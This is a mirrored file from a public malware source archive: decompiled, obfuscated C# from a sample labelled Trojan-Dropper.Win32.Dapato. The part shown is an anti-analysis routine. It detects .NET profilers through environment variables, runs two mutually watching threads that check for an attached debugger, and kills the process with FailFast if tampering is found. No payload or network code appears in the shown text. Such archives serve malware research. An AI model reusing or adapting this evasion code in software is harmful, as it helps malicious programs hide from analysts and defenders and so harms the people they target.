mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
78 lines
2.7 KiB
C#
78 lines
2.7 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: 倍鄻<E984BB>聍˵ꆬ
|
|||
|
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Threading;
|
|||
|
|
|||
|
internal static class 倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ
|
|||
|
{
|
|||
|
[DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
|||
|
private static extern int Ꮬꮼﮈ\uF1BE铰崘\uFFFD䉩(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
byte[] ProcessInformation,
|
|||
|
uint ProcessInformationLength,
|
|||
|
out int ReturnLength);
|
|||
|
|
|||
|
[DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
|
|||
|
private static extern uint \uF092됃戏잦ᰐ䣩㼑촓(
|
|||
|
IntPtr ProcessHandle,
|
|||
|
int ProcessInformationClass,
|
|||
|
byte[] ProcessInformation,
|
|||
|
uint ProcessInformationLength);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
|
|||
|
private static extern bool 䵕䞬遤\uA9FF亗\u2E54Ợ㝕(IntPtr hObject);
|
|||
|
|
|||
|
public static void 鈧렠\u1AF4鱛렪뜾㶘䄋()
|
|||
|
{
|
|||
|
switch (Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING"))
|
|||
|
{
|
|||
|
case null:
|
|||
|
switch (Environment.GetEnvironmentVariable("COR_PROFILER"))
|
|||
|
{
|
|||
|
case null:
|
|||
|
break;
|
|||
|
default:
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
break;
|
|||
|
default:
|
|||
|
label_1:
|
|||
|
Environment.FailFast("Profiler detected");
|
|||
|
break;
|
|||
|
}
|
|||
|
Thread parameter1 = new Thread(new ParameterizedThreadStart(倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ.ﱞꬕ興쉱㕷\uE4E0\u3371缣));
|
|||
|
Thread parameter2 = new Thread(new ParameterizedThreadStart(倍鄻\u2D97\uFFFD\uEF6C聍\u02F5ꆬ.ﱞꬕ興쉱㕷\uE4E0\u3371缣));
|
|||
|
parameter1.IsBackground = true;
|
|||
|
parameter2.IsBackground = true;
|
|||
|
parameter1.Start((object) parameter2);
|
|||
|
Thread.Sleep(500);
|
|||
|
parameter2.Start((object) parameter1);
|
|||
|
}
|
|||
|
|
|||
|
private static void ﱞꬕ興쉱㕷\uE4E0\u3371缣(object thread)
|
|||
|
{
|
|||
|
Thread.Sleep(1000);
|
|||
|
Thread thread1 = (Thread) thread;
|
|||
|
while (true)
|
|||
|
{
|
|||
|
if (Debugger.IsAttached || Debugger.IsLogging())
|
|||
|
Environment.FailFast("Debugger detected (Managed)");
|
|||
|
if (!thread1.IsAlive)
|
|||
|
goto label_2;
|
|||
|
label_1:
|
|||
|
Thread.Sleep(1000);
|
|||
|
continue;
|
|||
|
label_2:
|
|||
|
Environment.FailFast("Loop broken");
|
|||
|
goto label_1;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|